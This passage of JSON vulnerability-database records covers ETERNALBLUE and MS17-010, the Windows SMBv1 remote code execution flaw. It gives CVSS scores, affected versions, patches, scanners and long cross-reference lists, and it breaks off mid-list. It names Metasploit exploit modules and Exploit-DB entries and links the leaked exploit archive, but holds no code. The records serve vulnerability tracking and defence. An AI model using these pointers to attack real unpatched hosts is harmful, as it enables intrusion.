{"type": "seebug", "lastseen": "2017-11-19T12:00:03", "href": "https://www.seebug.org/vuldb/ssvid-92952", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "modified": "2017-04-15T00:00:00", "reporter": "Root", "description": "ETERNALBLUE is the SMBv1 remote code execution exploit from the Shadow Brokers leak; this record lists Windows XP through Windows Server 2012 as affected. It can be triggered by an unauthenticated remote attacker (CVSS Au:NONE) and corresponds to the following CVEs, which Microsoft addressed under bulletin MS17-010. Unpatched hosts can be identified with the Nmap smb-vuln-ms17-010 script or the Metasploit smb_ms17_010 scanner referenced by this entry.\n\n * [CVE-2017-0143](<http://cvedetails.com/cve/cve-2017-0143>)\n * [CVE-2017-0144](<http://cvedetails.com/cve/cve-2017-0144>)\n * [CVE-2017-0145](<http://cvedetails.com/cve/cve-2017-0145>)\n * [CVE-2017-0146](<http://cvedetails.com/cve/cve-2017-0146>)\n * [CVE-2017-0147](<http://cvedetails.com/cve/cve-2017-0147>)\n * [CVE-2017-0148](<http://cvedetails.com/cve/cve-2017-0148>)\n\nReference (leaked exploit archive): https://github.com/misterch0c/shadowbroker/blob/master/windows/specials/\n", "bulletinFamily": "exploit", "references": [], "viewCount": 436, "status": "poc,details", "sourceHref": "", "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "enchantments_done": [], "title": "ETERNALBLUE - Remote RCE via SMB & NBT (Windows XP to Windows 2012)", "id": "SSV:92952", "sourceData": "", "published": "2017-04-15T00:00:00", "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2017-11-19T12:00:03", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", 
"RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "seebug", "idList": ["SSV:92964"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", 
"TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-11-19T12:00:03", "rev": 2}, "vulnersScore": 7.7}, "immutableFields": [], "cvss2": {}, "cvss3": {}}
{"attackerkb": [{"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "0e9cc0596e7cc45cd53e3953f7e7394d", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\n**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using 
the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41891", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "https://www.exploit-db.com/exploits/41987", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", 
"http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-11-03T16:41:41", "history": [{"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "448cf2599fc5c7df65505aa1bdf93d9d", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 
<https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-11-15T18:38:31", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"modified": "2020-11-15T18:38:31", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": 
"kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": 
["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", 
"MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-11-15T18:38:31", "rev": 2, "value": 7.5, "vector": "NONE"}}, "objectVersion": "1.4", "attackerkb": {}, "wildExploited": false, "wildExploitedCategory": {}, "wildExploitedReports": [], "references_categories": {}, "tags": [], "mitre_vector": {}, "last_activity": null}, "lastseen": "2020-11-15T18:38:31", "differentElements": ["attackerkb", "wildExploited"], "edition": 1}, {"bulletin": {"id": "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "vendorId": null, "hash": "d3023dfbb1d1947a4b3462f81cadb1ae", "type": "attackerkb", "bulletinFamily": "info", "title": "CVE-2017-0143", "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \u201cWindows SMB Remote Code Execution Vulnerability.\u201d This vulnerability is different from those described in CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, and CVE-2017-0148.\n\n \n**Recent assessments:** \n \n**hrbrmstr** at May 12, 2020 7:49pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 
5**goodlandsecurity** at May 18, 2020 4:52pm UTC reported:\n\nThis CVE made it into US-CERT\u2019s \u201cTop 10\u201d bulletin released in May, 2020 \u2013 <https://www.us-cert.gov/ncas/alerts/aa20-133a> / <https://web.archive.org/web/20200512161248/https://www.us-cert.gov/ncas/alerts/aa20-133a>\n\n * Vulnerable Products: Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 \n\n * Associated Malware: Multiple using the EternalSynergy and EternalBlue Exploit Kit \n\n * Mitigation: Update affected Microsoft products with the latest security patches\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5\n", "published": "2017-03-17T00:00:00", "modified": "2020-07-30T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "href": "https://attackerkb.com/topics/zRrnOERfuE/cve-2017-0143", "reporter": "AttackerKB", "references": ["https://www.exploit-db.com/exploits/43970", "http://www.securityfocus.com/bid/96703", "https://www.exploit-db.com/exploits/41987", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0143", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://www.exploit-db.com/exploits/41891", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2020-11-18T06:39:05", "history": [], "viewCount": 4, "enchantments": 
{"dependencies": {"modified": "2020-11-18T06:39:05", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["SMNTC-96705", 
"SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"], "type": "threatpost"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", 
